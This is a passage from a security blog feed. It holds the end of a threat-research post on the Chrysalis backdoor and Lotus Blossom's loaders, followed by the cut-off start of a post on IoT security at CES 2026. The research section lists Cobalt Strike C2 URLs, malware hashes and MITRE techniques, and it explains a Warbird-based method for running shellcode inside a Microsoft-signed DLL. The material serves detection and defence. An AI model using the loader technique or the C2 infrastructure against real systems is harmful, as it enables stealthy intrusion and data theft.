data-sys-asset-uid="blt7fdc600725c456fa" data-sys-asset-filename="lotus-blossom-decrypted-configuration.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Decrypted configuration" data-sys-asset-alt="lotus-blossom-decrypted-configuration.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8: Decrypted configuration</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Parsing of the decrypted configuration data confirms that retrieved shellcode is </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Cobalt Strike (CS) HTTPS beacon</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>with http-get </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>api.wiresguard.com/update/v1</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and http-post </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>api.wiresguard.com/api/FileUpload/submit</strong></span></span><span style='font-size: undefined;'> urls.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Analysis of the initial evidence revealed a consistent execution chain: a loader embedding </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Metasploit block_api</strong></span></span><span style='font-size: undefined;'> shellcode that downloads a </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Cobalt Strike beacon</strong></span></span><span style='font-size: undefined;'>. The unique decryption stub and configuration XOR key </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CRAZY</strong></span></span><span style='font-size: undefined;'> allowed us to pivot into an external hunt, uncovering additional loader variants.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt989ba6e7f4c51324/6980c3e773b29add1cc2cb00/lotus-blossom-Execution-flow.png" alt="lotus-blossom-Execution-flow.png" caption="Figure 9: Execution flow followed by conf.c and other loaders" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Execution-flow.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt989ba6e7f4c51324/6980c3e773b29add1cc2cb00/lotus-blossom-Execution-flow.png" data-sys-asset-uid="blt989ba6e7f4c51324" data-sys-asset-filename="lotus-blossom-Execution-flow.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Execution flow followed by conf.c and other loaders" data-sys-asset-alt="lotus-blossom-Execution-flow.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9: Execution flow followed by conf.c and other loaders</figcaption></div></figure><h4 style="direction: ltr;">Variation of loaders and shellcode</h4><p style="direction: ltr;"><span style='font-size: undefined;'>In the last year, four similar files were uploaded to public repositories.</span></p><h4>Loader 1:</h4><p><strong>SHA-256: </strong>0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd</p><p><strong>Shellcode SHA-256: </strong>4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8</p><p><strong>User Agent: </strong>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36</p><p style="direction: ltr;"><strong>URL hosting CS beacon: </strong>http://59[.]110.7.32:8880/uffhxpSy</p><p style="direction: ltr;"><strong>CS http-get URL: </strong>http://59[.]110.7.32:8880/api/getBasicInfo/v1</p><p style="direction: ltr;"><strong>CS http-post URL: </strong>http://59[.]110.7.32:8880/api/Metadata/submit</p><h4>Loader 2:</h4><p><strong>SHA-256: </strong>e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda</p><p><strong>Shellcode SHA-256: </strong>078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5</p><p><strong>User Agent: </strong>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36</p><p style="direction: ltr;"><strong>URL hosting CS beacon: </strong>http://124[.]222.137.114:9999/3yZR31VK</p><p style="direction: ltr;"><strong>CS http-get URL: </strong>http://124[.]222.137.114:9999/api/updateStatus/v1</p><p style="direction: ltr;"><strong>CS http-post URL: </strong>http://124[.]222.137.114:9999/api/Info/submit</p><h4>Loader 3:</h4><p><strong>SHA-256: </strong>b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3</p><p><strong>Shellcode SHA-256: </strong>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</p><p><strong>User Agent:</strong> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36</p><p style="direction: ltr;"><strong>URL hosting CS beacon: </strong>https://api[.]wiresguard[.]com/users/system</p><p style="direction: ltr;"><strong>CS http-get URL: </strong>https://api[.]wiresguard[.]com/api/getInfo/v1</p><p style="direction: ltr;"><strong>CS http-post URL: </strong>https://api[.]wiresguard[.]com/api/Info/submit</p><h4>Loader 4:</h4><p><strong>SHA-256: </strong>fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a</p><p><strong>Shellcode SHA-256: </strong>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</p><p><strong>User Agent: </strong>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36</p><p style="direction: ltr;"><strong>URL hosting CS beacon: </strong>https://api[.]wiresguard[.]com/users/system</p><p style="direction: ltr;"><strong>CS http-get URL: </strong>https://api[.]wiresguard[.]com/api/getInfo/v1</p><p style="direction: ltr;"><strong>CS http-post URL: </strong>https://api[.]wiresguard[.]com/api/Info/submit</p><p>⠀</p><p><span style='font-size: undefined;'>From all the loaders we analyzed, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Loader 3</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>piqued our interest for three reasons - shellcode </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>encryption</strong></span></span><span style='font-size: undefined;'> technique, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>execution</strong></span></span><span style='font-size: undefined;'> ,</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>almost identical C2</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>to beacon that was found on the infected asset. All the previous samples used a pretty common technique to execute the shellcode - decrypt embedded shellcode in user space, change the protection of memory region to executable state, and invoke decrypted code via </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreateThread</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>/ </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreateRemoteThread</strong></span></span><span style='font-size: undefined;'>; Loader 3 (original name </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'>) violates this approach. </span></p><h4 style="direction: ltr;">Analysis of Loader 3 - ConsoleApplication2.exe </h4><p><span style='font-size: undefined;'>At the first glance, the logic of the sample is straightforward: Load the DLL </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>clipc.dll</strong></span></span><span style='font-size: undefined;'>, overwrite first 0x490 bytes, change the protection to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>PAGE_EXECUTE_READ</strong></span></span><span style='font-size: undefined;'> (0x20), and then invoke </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>NtQuerySystemInformation</strong></span></span><span style='font-size: undefined;'><strong>. </strong></span><span style='font-size: undefined;'>Two interesting notes to highlight here - bytes copied into the memory region of clipc.dll are not valid shellcode and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>NtquerySystemInformation</strong></span></span><span style='font-size: undefined;'> is used to “</span><a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntquerysysteminformation"><span style='font-size: undefined;'>Retrieve the specified system information</span></a><span style='font-size: undefined;'>”, not to execute code.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad7ccddfd03069d8/6980c4cca05d7d5b4d9ac74d/lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" caption="Figure 10: Snippet from ConsoleApplication2.exe" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad7ccddfd03069d8/6980c4cca05d7d5b4d9ac74d/lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-uid="bltad7ccddfd03069d8" data-sys-asset-filename="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Snippet from ConsoleApplication2.exe" data-sys-asset-alt="lotus-blossom-Snippet-from-ConsoleApplication2-exe.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 10: Snippet from ConsoleApplication2.exe</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Looking into the copied data reveals two “magic numbers” </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>DEADBEEF</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CAFEAFE</strong></span></span><span style='font-size: undefined;'>, but nothing else. However, the execution of shellcode is somehow successful, so what’s going on?</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5dfccfc7e3596d19/6980c4cccaf3ac7371ce0c06/lotus-blossom-data-copied-clipc-dll.png" alt="lotus-blossom-data-copied-clipc-dll.png" caption="Figure 11: Data copied into clipc.dll" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-data-copied-clipc-dll.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5dfccfc7e3596d19/6980c4cccaf3ac7371ce0c06/lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-uid="blt5dfccfc7e3596d19" data-sys-asset-filename="lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 11: Data copied into clipc.dll" data-sys-asset-alt="lotus-blossom-data-copied-clipc-dll.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 11: Data copied into clipc.dll</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>According to the official documentation, the first parameter of NtQuerySystemInformation is of type </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>SYSTEM_INFORMATION_CLASS</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>which specifies the category of system information to be queried. During static analysis in </span><span style='font-size: undefined;'><strong>IDA Pro</strong></span><span style='font-size: undefined;'>, this parameter was initially identified as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>SystemExtendedProcessInformation|0x80</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>but looking for this value in MSDN and other public references didn’t provide any explanation on how the execution was achieved. But, searching for the original value passed to the function </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>(0xB9)</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>uncovered something interesting. The following </span><a href="https://downwithup.github.io/blog/post/2023/04/23/post9.html"><span style='font-size: undefined;'>blog</span></a><span style='font-size: undefined;'> by DownWithUp covers Microsoft Warbird, which could be described as an internal </span><a href="https://cirosec.de/en/news/abusing-microsoft-warbird-for-shellcode-execution/"><span style='font-size: undefined;'>code protection and obfuscation framework</span></a><span style='font-size: undefined;'><strong>. </strong></span><span style='font-size: undefined;'>These resources confirm IDA misinterpretation of the argument which should be </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>SystemCodeFlowTransition</strong></span></span><span style='font-size: undefined;'>, a necessary argument to invoke Warbird functionality. Additionally, DownWithUp’s blog post mentioned the possible operations:</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc3eb7e9c08aca2f0/6980c55fef7b8950faaca1b2/lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" caption="Figure 12: Warbird operations documented by DownWithUp" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc3eb7e9c08aca2f0/6980c55fef7b8950faaca1b2/lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-uid="bltc3eb7e9c08aca2f0" data-sys-asset-filename="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Warbird operations documented by DownWithUp" data-sys-asset-alt="lotus-blossom-Warbird-operations-documented-by-DownWithUp.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 12: Warbird operations documented by DownWithUp</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Referring to the snippet we saw from </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'>, the operation is equal to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>WbHeapExecuteCall</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>which gives us the answer on how the shellcode gained execution. Thanks to work of other researchers, we also know that this technique only works if the code resides inside of memory of Microsoft signed binary, thus revealing why </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>clipc.dll</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>has been used.</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>The blog post from </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>cirosec</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>also contains a link for their </span><a href="https://github.com/cirosec/warbird-demos/blob/main/Loader/Loader.cpp"><span style='font-size: undefined;'>POC</span></a><span style='font-size: undefined;'> of this technique which is almost the same replica of </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'>, hinting that author of </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'> simply copied it and modified to execute </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Metasploit block_api</strong></span></span><span style='font-size: undefined;'> shellcode instead of the benign calc from POC. The comparison of the Cobalt Strike beacon configuration delivered via </span><span style='font-size: undefined;'><em><strong>“</strong></em></span><span style='font-size: undefined;'><em>conf.c</em></span><span style='font-size: undefined;'><em><strong>”</strong></em></span><span style='font-size: undefined;'><em> </em></span><span style='font-size: undefined;'>and </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'> revealed shared trades between these two, most notably </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>domain</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>public key</strong></span></span><span style='font-size: undefined;'><strong>,</strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>process injection technique</strong></span></span><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Attribution to Lotus Blossom</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Attribution is primarily based on strong similarities between the initial loader observed in this intrusion and previously published </span><a href="https://sed-cms.broadcom.com/system/files/threat-hunter-whitepaper/2025-04/2025_04_ChinaLinked_Espionage_Actors.pdf"><span style='font-size: undefined;'>Symantec</span></a><span style='font-size: undefined;'> research. Particularly the use of a renamed </span><span style='font-size: undefined;'><em>“Bitdefender Submission Wizard”</em></span><span style='font-size: undefined;'> to side-load </span><span style='font-size: undefined;'><em>“log.dll”</em></span><span style='font-size: undefined;'> for decrypting and executing an additional payload.</span><br/><span style='font-size: undefined;'>In addition, similarities of the execution chain of </span><span style='font-size: undefined;'><em>“conf.c”</em></span><span style='font-size: undefined;'> retrieved from the infected asset and other loaders that we found, supported by the same </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>public key</strong></span></span><span style='font-size: undefined;'> extracted from CS beacons delivered through </span><span style='font-size: undefined;'><em>“conf.c”</em></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><em>“ConsoleApplication2.exe”</em></span><span style='font-size: undefined;'> suggests with moderate confidence, that the threat actor behind this campaign is likely Lotus Blossom.</span></p><h2 style="direction: ltr;">Conclusion</h2><p style="direction: ltr;">The discovery of the <span data-type='inlineCode'>Chrysalis</span> backdoor and the <span data-type='inlineCode'>Warbird</span> loader highlights an evolution in Lotus Blossom's capabilities. While the group continues to rely on proven techniques like DLL sideloading and service persistence, their multi-layered shellcode loader and integration of undocumented system calls (NtQuerySystemInformation) mark a clear shift toward more resilient and stealth tradecraft.</p><p style="direction: ltr;">What stands out is the mix of tools: the deployment of custom malware (Chrysalis) alongside commodity frameworks like Metasploit and Cobalt Strike, together with the rapid adaptation of public research (specifically the abuse of Microsoft Warbird). This demonstrates that Lotus Blossom is actively updating their playbook to stay ahead of modern detection.</p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">InsightIDR and MDR</h3><p style="direction: ltr;">InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. <span data-type='inlineCode'>Suspicious Process - Child of Notepad++ Updater (gup.exe)</span> and <span data-type='inlineCode'>Suspicious Process - Chrysalis Backdoor</span> are two examples of deployed detections that will alert on behavior related to Chrysalis. Rapid7 will also continue to iterate detections as new variants emerge, giving customers continuous protection without manual tuning.</p><h3 style="direction: ltr;">Intelligence Hub</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers using Rapid7’s Intelligence Hub gain direct access to Chrysalis backdoor, Metasploit loaders and Cobalt Strike IOCs, including any future indicators as they are identified.</span></p><h2 style="direction: ltr;">Indicators of compromise (IoCs)</h2><h3 style="direction: ltr;">File indicators</h3><p><em><strong>Note: </strong></em><em>data may appear cut-off or hidden due to the string lengths in column 2. You can copy the full string by highlighting what is visible.</em></p><table><tbody><tr><td><p>update.exe</p></td><td><p>a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9</p></td></tr><tr><td><p>[NSIS.nsi]</p></td><td><p>8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e</p></td></tr><tr><td><p>BluetoothService.exe</p></td><td><p>2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924</p></td></tr><tr><td><p>BluetoothService</p></td><td><p>77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e</p></td></tr><tr><td><p>log.dll</p></td><td><p>3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad</p></td></tr><tr><td><p>u.bat</p></td><td><p>9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600</p></td></tr><tr><td><p>conf.c</p></td><td><p>f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a</p></td></tr><tr><td><p>libtcc.dll</p></td><td><p>4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906</p></td></tr><tr><td><p>admin</p></td><td><p>831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd</p></td></tr><tr><td><p>loader1</p></td><td><p>0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd</p></td></tr><tr><td><p>uffhxpSy</p></td><td><p>4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8</p></td></tr><tr><td><p>loader2</p></td><td><p>e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda</p></td></tr><tr><td><p>3yzr31vk</p></td><td><p>078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5</p></td></tr><tr><td><p>ConsoleApplication2.exe</p></td><td><p>b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3</p></td></tr><tr><td><p>system</p></td><td><p>7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd</p></td></tr><tr><td><p>s047t5g.exe</p></td><td><p>fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a</p></td></tr></tbody></table><h3 style="direction: ltr;">Network indicators</h3><table><tbody><tr><td><p>95.179.213.0</p></td></tr><tr><td><p>api[.]skycloudcenter[.]com</p></td></tr><tr><td><p>api[.]wiresguard[.]com</p></td></tr><tr><td><p>61.4.102.97</p></td></tr><tr><td><p>59.110.7.32</p></td></tr><tr><td><p>124.222.137.114</p></td></tr></tbody></table><h3 style="direction: ltr;">MITRE TTPs</h3><table><tbody><tr><td><p><strong>ATT&CK ID</strong></p></td><td><p><strong>Name</strong></p></td></tr><tr><td><p>T1204.002</p></td><td><p>User Execution: Malicious File</p></td></tr><tr><td><p>T1036</p></td><td><p>Masquerading</p></td></tr><tr><td><p>T1027</p></td><td><p>Obfuscated Files or Information</p></td></tr><tr><td><p>T1027.007</p></td><td><p>Obfuscated Files or Information: Dynamic API Resolution</p></td></tr><tr><td><p>T1140</p></td><td><p>Deobfuscate/Decode Files or Information</p></td></tr><tr><td><p>T1574.002</p></td><td><p>DLL Side-Loading</p></td></tr><tr><td><p>T1106</p></td><td><p>Native API</p></td></tr><tr><td><p>T1055</p></td><td><p>Process Injection</p></td></tr><tr><td><p>T1620</p></td><td><p>Reflective Code Loading</p></td></tr><tr><td><p>T1059.003</p></td><td><p>Command and Scripting Interpreter: Windows Command Shell</p></td></tr><tr><td><p>T1083</p></td><td><p>File and Directory Discovery</p></td></tr><tr><td><p>T1005</p></td><td><p>Data from Local System</p></td></tr><tr><td><p>T1105</p></td><td><p>Ingress Tool Transfer</p></td></tr><tr><td><p>T1041</p></td><td><p>Exfiltration Over C2 Channel</p></td></tr><tr><td><p>T1071.001</p></td><td><p>Application Layer Protocol: Web Protocols (HTTP/HTTPS)</p></td></tr><tr><td><p>T1573</p></td><td><p>Encrypted Channel</p></td></tr><tr><td><p>T1547.001</p></td><td><p>Boot or Logon Autostart Execution: Registry Run Keys</p></td></tr><tr><td><p>T1543.003</p></td><td><p>Create or Modify System Process: Windows Service</p></td></tr><tr><td><p>T1480.002</p></td><td><p>Execution Guardrails: Mutual Exclusion</p></td></tr><tr><td><p>T1070.004</p></td><td><p>Indicator Removal on Host: File Deletion</p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'><strong><em>*</em></strong></span><span style='font-size: undefined;'><em>IOCs contributed by </em></span><a href="https://x.com/AIexGP"><span style='font-size: undefined;'><em>@AIexGP</em></span></a><span style='font-size: undefined;'><em> on X.</em></span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 recommends updating to the latest version of Notepad++.  In addition, the IoCs provided above and within Rapid7 Intelligence Hub can be used to hunt within your logs during the timeframe of June through November, 2025, as this is the timeframe when the backdoor activity is known to have been taking place. </span></p><h4><span style='font-size: undefined;'><em>Interested in learning more?</em></span></h4><p><span style='font-size: undefined;'>Catch </span><a href="https://www.brighttalk.com/webcast/10457/661975?utm_source=blog&amp;utm_medium=webcast&amp;utm_content=blog-1-chrysalis-registration&amp;utm_campaign=global-mdr-2026-q1-webinar-prospect-eng" target="_blank"><span style='font-size: undefined;'><strong>Inside Chrysalis</strong></span></a><span style='font-size: undefined;'>, Rapid7's webinar led by Christiaan Beek, on-demand via BrightTALK.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit</link>
      <guid isPermaLink="false">bltd41e34819d964415</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Malware]]></category><dc:creator><![CDATA[Ivan Feigl]]></dc:creator>
      <pubDate>Mon, 02 Feb 2026 15:49:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebc2810157aecfaf/68af2715c53b04810df94abb/blog-hero-generic-pixel.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Beyond the Device: Exploring the New Security Risks of Interconnected IoT at CES 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Attending CES over the last several years has provided me with a valuable opportunity to observe how rapidly IoT technology continues to evolve across consumer and enterprise domains. This was my fourth year attending CES and I have seen a continued growth and advancement across multiple technology categories, from mobile devices and wearables, to AI-driven automation and robotics, to connected infrastructure. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This year’s show floor highlighted how deeply embedded “smart” technology has become within our everyday systems. As an IoT security researcher, what stood out to me most was not just the pace of innovation, but how increasingly interconnected these technologies have become, often relying on shared backend services, cloud platforms, and automated decision-making. These trends highlight the importance of examining not only individual devices, but the broader trust relationships and infrastructure architectures that support them.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt33addc85bd5b2ca8/69611b13a3a8ca0008a7cc2c/CES2026-iot-1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CES2026-iot-1.png" asset-alt="CES2026-iot-1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt33addc85bd5b2ca8/69611b13a3a8ca0008a7cc2c/CES2026-iot-1.png" data-sys-asset-uid="blt33addc85bd5b2ca8" data-sys-asset-filename="CES2026-iot-1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CES2026-iot-1.png" sys-style-type="display"/></figure><h2><span style='color:rgb(67, 67, 67);'>AI-driven automation is no longer experimental</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>It was clear at CES 2026 that AI-driven automation is no longer experimental, it has become operational. Throughout automation, robotics, and transportation technology, decision-making processes are increasingly being delegated to backend AI systems that consume device telemetry and trigger real-world actions. From a security perspective, this marks a primary shift where trust relationships that were once local are now centralized, automated, and capable of impacting all devices within a larger ecosystem. The challenge moving forward doesn’t just involve securing devices; we will have to secure the data these devices produce, plus ensure that data is not altered or corrupted in a way that would impact all devices under the control of the backend AI systems.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte29332c3bf52a279/69611b131f87f80008263ecf/CES2026-iot-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CES2026-iot-2.png" asset-alt="CES2026-iot-2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte29332c3bf52a279/69611b131f87f80008263ecf/CES2026-iot-2.png" data-sys-asset-uid="blte29332c3bf52a279" data-sys-asset-filename="CES2026-iot-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CES2026-iot-2.png" sys-style-type="display"/></figure><h2><span style='color:rgb(67, 67, 67);'>Robotics innovation demands urgent security action</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>One of the more striking areas of progress has been in robotics, particularly in dexterity and fine motor control. Seeing robots play the piano or fold cloth highlighted how far robotic manipulation has come. Moving beyond their old rigid, pre-programmed motion toward a more adaptive interaction with our physical world. While we are still years away from anything resembling The Jetsons, these demonstrations show clear forward momentum. Before increasingly capable and autonomous robots become more deeply integrated into our world, we need to seriously address how to build security into the underlying technology. It’s also critical to maintain and secure the vast amount of data they will gather.  </span></p><p style="direction: ltr;"></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt63272a2216464fa9/69611b13e485f4000860609c/CES2026-iot-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="CES2026-iot-3.png" asset-alt="CES2026-iot-3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt63272a2216464fa9/69611b13e485f4000860609c/CES2026-iot-3.png" data-sys-asset-uid="blt63272a2216464fa9" data-sys-asset-filename="CES2026-iot-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="CES2026-iot-3.png" sys-style-type="display"/></figure><h2><span style='color:rgb(67, 67, 67);'>Mobile and wearable technologies are “always on”</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>During CES this year, I also observed advances in mobile technology and wearables. While these devices have long been a staple of the show and continue to evolve incrementally each year, the growing integration of AI has noticeably expanded their capabilities. Features such as continuous sensing and adaptive behavior introduce new questions around security and privacy that go beyond traditional mobile threat models. As these technologies increasingly find their way into the hands of employees, they also raise important considerations for organizational security posture. This shift prompts a larger question CISOs should ask themselves: </span><span style='font-size: undefined;'><em>have our organization’s mobile device policies evolved alongside these technologies, or are they still grounded in smartphone-only assumptions from a decade ago?</em></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For example, one of the most concerning mobile device technologies I observed was a device designed for use in corporate meetings that could automatically take notes, transcribe discussions, and translate conversations in real time. While such capabilities can clearly improve productivity and collaboration, especially in global organizations, they also introduce new security and privacy considerations. A device that is continuously listening, processing speech, and potentially transmitting 